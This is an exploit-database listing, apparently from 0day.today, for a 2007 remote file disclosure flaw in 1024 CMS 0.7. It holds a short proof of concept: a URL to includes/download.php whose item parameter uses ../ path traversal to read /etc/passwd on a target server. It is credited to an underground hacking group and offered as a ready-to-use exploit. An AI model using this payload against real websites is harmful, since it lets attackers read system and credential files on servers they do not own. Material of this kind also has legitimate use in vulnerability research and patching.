[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

1024 CMS 0.7 (download.php item) Remote File Disclosure Vulnerability

Author
Dj7xpl
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1814
Category
web applications
Date add
01-05-2007
Platform
unsorted
=====================================================================
1024 CMS 0.7 (download.php item) Remote File Disclosure Vulnerability
=====================================================================


                                                       \#'#/
                                                       (-.-)
                              --------------------oOO---(_)---OOo-------------------
                              |                [ Y! Underground Group ]            |
                              ------------------------------------------------------


<--------------------------------------------------------------------------------------------------------------------->

 [!] Portal :  1024 CMS Version 0.7
 [!] Vendor :  http://www.treble.lfhost.com
 [!] Type   :  Remote File Disclosure Vuln
 [!] We Are :  Y4Ho0 -Mr.Mithridates -Sir SiSiLi -System Failure -Satanic Soulfull -And Me

<--------------------------------------------------------------------------------------------------------------------->

<--------------------------------------------------------------------------------------------------------------------->

PoC :

http://[Target]/[Path]/includes/download.php?item=../uploads/[File]
http://Target.com/1024/includes/download.php?item=../uploads/../../../../../etc/passwd

<--------------------------------------------------------------------------------------------------------------------->



#  0day.today [2024-12-24]  #